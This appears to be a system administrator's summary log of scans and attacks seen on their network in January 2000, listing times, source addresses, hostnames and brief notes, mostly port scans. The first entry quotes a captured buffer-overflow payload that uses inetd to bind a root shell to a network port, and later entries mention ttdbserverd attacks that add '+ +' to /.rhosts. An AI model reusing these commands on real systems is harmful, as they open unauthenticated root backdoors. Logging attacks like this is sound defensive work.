Short summary of attacks against us for Jan 2000

time GMT(-5)  source_ip[:port] (dns name, if any)  attack/scan/notes

2000/01/09-02:21:35.27 24.132.52.119 (node13477.a2000.nl) attack machines with buffer overflow
    ../bin/sh.-c.echo 'netstat stream tcp nowait root /bin/sh sh -i' > /tmp/ .nfo; /usr/sbin/inetd -s /tmp/.nfo; rm -f /tmp/.nfo;..............ADM_FENCE.....
    ......................netmgt_endofargs
    /bin/sh.-c.echo netstat stream tcp nowait root /bin/sh sh -i > /tmp/.heh ; /usr/sbin/inetd -s /tmp/.heh; rm/tmp/.heh;...............ADM_FENCE............
    ...............netmgt_endofargs
2000/01/07-15:36:19.44 200.196.82.49 (b19049.dial-rjo.impsat.com.br) scan net for port 53
2000/01/07-16:13:23.92 199.2.117.66 (shell.pacifier.com) scan net for various ports
2000/01/07-17:20:15.23 202.212.5.30 (goo212.goo.ne.jp) scan net for port 53 - slowly, 1 connect per 1-4 hrs.
2000/01/07-17:48:37.0 216.165.166.163 (dns.madison.com) ???
2000/01/07-18:29:44.64 158.152.1.58 (cache-1.ns.demon.net) repeatedly probe ace and boss for nameserver
2000/01/07-19:29:49.43 161.184.178.200 (edtntnt8-port-454.agt.net) port scan
2000/01/08-01:05:57.03 24.239.21.177 (n06h1177.ex-pressnet.com) port 137 scan
2000/01/08-02:45:52.66 216.17.131.71 (asp071.asptech.com) scan couple of machines for port 111
2000/01/08-03:06:46.34 24.95.57.139 (dhcp9557139.columbus.rr.com) net scan port 111
2000/01/08-03:45:27.06 204.167.182.75 (hngvip.com) port 137 scan
2000/01/08-06:58:39.61 209.67.241.201 port 137 scan
2000/01/08-07:03:27.52 216.17.34.140 (linux1.goztech.com) scan for rpc pgm 100232, then connect to port 750?
2000/01/08-07:12:55.65 128.11.41.246 (bankone7.cam-colo.bbnplanet.com) port scan
2000/01/08-12:49:49.45 204.122.22.169 (iceman.ndip.eskimo.net) port 137 scan
2000/01/08-13:11:36.6 216.165.166.163 (dns.madison.com) ???
2000/01/08-14:40:01.11 209.98.163.187 probe net for port 111
2000/01/08-17:29:20.56 24.114.22.187 (cr284960-a.etob1.on.wave.home.com) scan net for port 21
2000/01/08-17:56:24.63 62.136.67.74 (modem-74.finasteride.dialup.pol.co.uk) port scan
2000/01/08-18:36:37.16 62.52.251.81 (dsdf-m251-81.pool.mediaways.net) port scan
2000/01/08-21:57:08.35 216.98.68.125 (PM2-29.NETVA.COM) scan 132.235.1.80 for port 8080?
2000/01/08-21:57:21.76 216.98.68.125 (PM2-29.NETVA.COM) scan 132.235.1.80 for port 3128?
2000/01/08-22:31:20.78 4.16.11.103 (PPPb44-ResaleFortWorth2-2R1005.saturn.bbn.com) scan ace port 137
2000/01/08-23:22:49.19 212.81.241.38 (ppp28966.01019freenet.de) port 137 scan
2000/01/09-00:29:42.75 210.219.78.129 (ns.netping.co.kr) portmapper scan
2000/01/09-00:51:17.88 207.167.64.158 (sdts3-158.znet.net) port 137 scan
2000/01/09-02:27:15.67 208.16.68.100 (famvid.com) netstat scan
2000/01/09-03:30:04.11 216.32.120.55 (racerunner.ebay.com) port 137 scan
2000/01/09-03:40:11.44 208.230.48.17 (muzi.net) scan port 40958 thru port 41079.
2000/01/09-05:10:47.44 202.96.191.124 (gnet124.szptt.net.cn) port 137 scan
2000/01/09-12:12:54.45 194.162.100.205 (enn.globe.de) portmapper scan
2000/01/09-12:21:51.69 195.171.253.91 (host5-171-253-91.btinternet.com) scan net for 2140
2000/01/09-13:36:54.80 210.84.8.3 (slsdn33p03.ozemail.com.au) port 137 scan
2000/01/09-15:29:35.95 151.200.125.73 (client-151-200-125-73.bellatlantic.net) port scan
2000/01/09-18:09:11.64 202.212.5.30 (goo212.goo.ne.jp) port 2001? and other ports on net.
2000/01/09-19:08:55.61 208.184.172.182 (208.184.172.182.aureate.com) ??
2000/01/09-19:32:46.14 207.153.66.206 (plague.mudgate.com) portmapper scan
2000/01/09-20:33:23.77 216.32.68.11 scan port 33434
2000/01/09-22:43:31.69 147.231.100.202 (pink.ujf.cas.cz) scan ace for port 111
2000/01/10-00:30:38.24 129.116.81.62 (amazo.engr.utexas.edu) scan net for port 53
2000/01/10-01:45:48.70 24.216.16.167 (24-216-16-167.hsacorp.net) port 137 scan
2000/01/10-09:26:41.42 216.32.68.11 scan port 33434
2000/01/10-09:30:21.74 209.67.78.200 ace and boss for port 33434
2000/01/10-09:55:41.52 206.15.143.238 (quincy-ip-2-238.dynamic.ziplink.net) port 137 scan
2000/01/10-09:57:14.94 207.172.216.104 (207-172-216-104.s104.tnt1.sbo.ma.dialup.rcn.com) port 137 scan
2000/01/10-10:16:10.50 212.250.37.52 (p-307-virgin7.tch.virgin.net) port 137 scan
2000/01/10-12:07:37.17 213.4.35.252 port 137 scan
2000/01/10-12:38:56.10 209.112.37.9 (canada1.rs1885.com) port 137 scan
2000/01/10-15:50:56.66 207.54.32.138 (ig-88.symix.com) probe of port 137
2000/01/10-16:46:45.52 206.141.200.36 (dyn1-tnt1-36.dayton.oh.ameritech.net) probe port 137 on seorf
2000/01/10-19:35:19.94 192.100.181.240 scan of net for port 111
2000/01/11-00:23:08.20 216.25.117.208 probe port 132
2000/01/11-01:05:20.15 216.192.169.47 (chi-qbu-nvn-vty47.as.wcom.net) probe port 137
2000/01/11-01:41:44.65 210.230.197.132 scan machines for port 111
2000/01/11-12:56:29.44 204.221.88.145 (usr-virginia-145.uslink.net) scan port 137 on seorf
2000/01/11-17:17:49.41 208.226.48.196 scan port 137 on seorf
2000/01/11-20:14:55.81 200.44.56.163 scan port 137 on ace and boss
2000/01/11-20:29:42.14 207.220.178.211 (col-oh35-83.ix.netcom.com) scan port 137 on ace
2000/01/11-21:03:37.85 168.126.199.80 scan port 111 on ace
2000/01/11-21:19:51.95 150.159.224.8 (gate1.lci.net) scan ports 22480-22496.
2000/01/11-21:37:02.63 207.245.20.130 (PORT-2118.info-internet.net) scan port 137 on ace
2000/01/11-22:27:07.96 63.17.37.200 (1Cust200.tnt17.det3.da.uu.net) probe port 137
2000/01/11-22:49:52.81 168.126.199.80 scan port 111 on ace
2000/01/11-23:20:35.54 168.126.199.80 scan port 111 on ace
2000/01/12-22:37:25.64 210.230.197.132:2666 scan net for port 111
2000/01/12-01:30:43.21 205.252.11.45 (205.252.11.45) scan port 137 on seorf
2000/01/12-02:56:24.55 202.96.191.124 (202.96.191.124) scan port 137 on ace
2000/01/12-03:33:05.79 210.181.57.57 dump portmapper on ace
2000/01/12-05:13:33.02 168.73.181.40 scan port 137 on ace
2000/01/12-05:51:51.35 206.77.34.4:53 (pirate.crawford.isd.tenet.edu) scan net for port 111
2000/01/12-08:33:52.07 210.181.57.57 dump portmapper on ace
2000/01/12-10:26:09.96 212.211.70.37 scan port 137 on ace
2000/01/13-10:29:27.80 137.48.1.30:2666 (qmaster.unomaha.edu) scan net for port 111
2000/01/13-17:00:16.56 212.184.160.33 () scan net for port 111
2000/01/14-12:40:46.33 161.58.250.237 (what3vah.org) random connections to 132.235.2.66 every couple hrs.
2000/01/14-20:54:17.25 63.70.24.90:2666 () scan net for port 111
2000/01/14-22:43:25.46 208.31.69.4 () probe port 137 on pc
2000/01/14-23:24:10.74 63.71.58.85:2666 () scan net for port 111
2000/01/15-11:11:19.56 130.243.68.120 (cal1.idt.mdh.se) probe ports 110, 109 and 143 on ace
2000/01/15-21:31:59.22 35.8.242.52 (study-abroad.isp.msu.edu) probe portmapper on ace
2000/01/15-18:44:33.54 198.62.174.1:2666 (alpha.dtix.com) scan host 132.235.1.188 for port 111
2000/01/15-22:28:59.26 209.207.141.157:2666 () probe network for port 111
2000/01/16-12:38:56.55 194.78.84.26 () portmapper probe on ace
2000/01/16-21:13:27.81 130.243.68.120 (cal1.idt.mdh.se) probe ports 110, 109 and 143 on ace
2000/01/17-02:12:12.51 24.28.198.159 (fx4-1-159.mgfairfax.rr.com) scan net for port 111
2000/01/17-02:24:23.47 204.210.231.120 (dhcp231120.columbus.rr.com) scan net for port 139
2000/01/17-04:05:56.92 209.38.201.106 () probe ace ports 111, 1026, 876
2000/01/17-09:44:10.11 210.96.145.188 () scan net for port 12345
2000/01/18-09:28:26.64 207.139.255.15 (dialin15.quebec.globalserve.net) scan net for port 111
2000/01/17-09:55:46.22 203.36.3.133 (dialup1-ppp133.wire.net.au) probe port 137 on ace and seorf every couple hrs.
2000/01/18-22:47:10.26 144.171.222.113:137 (b2221.nas.edu) scan port 137 on net
2000/01/18-17:14:05.12 205.188.3.147:5190 () try to connect to 132.235.18.42:1031 every hour or so.
2000/01/20-01:20:35.59 216.209.29.31 (HSE-Toronto-ppp88018.sympatico.ca) net probe individual addrs. for port 12345
2000/01/20-21:53:15.31 209.183.154.86 broadcast 255.255.255.255 probe of net for port 161, and port 80,21,25,161 on selected machines
2000/01/20-22:56:10.16 212.242.97.29 (cvx-mal-1-29.ppp.netlink.se) broadcast 255.255.255.255 probe of net for port 2140
2000/01/20-03:24:14.63 128.171.4.163 (volcano2.pgd.hawaii.edu) portmon probe on ace
2000/01/21-05:53:07.28 203.234.129.221 () portmon probe on ace
2000/01/21-10:03:55.19 207.69.200.132 (irc.mindspring.com) broadcast 255.255.255.255 probe of net for port 1540
2000/01/21-10:30:44.45 207.69.200.132 (irc.mindspring.com) broadcast 255.255.255.255 probe of net for port 1702

From here on, dates are in EST/EDT, and only the interesting entries are listed instead of all of them.

2000/01/28-20:45:58.38 212.205.254.233 (athe530-q233.otenet.gr) scan for port 1243 on net
2000/01/29-08:26:49.93 130.184.165.229 (tesla.eleg.uark.edu) ttdbserverd buffer overflow attack to start copy of inetd (/tmp/bob attack)
2000/01/29-14:32:22.63 202.187.143.10 (Malaysia) ttdbserverd buffer overflow attack to add "+ +" to /.rhosts.a
2000/01/29-15:59:02.92 209.240.21.24 scan for port 21 on net
2000/01/30-13:38:54.96 130.184.165.229 (tesla.eleg.uark.edu) ttdbserverd buffer overflow attack to start copy of inetd (/tmp/bob attack)
2000/01/31-15:37:56.11 12.78.130.92 scan net for port 12345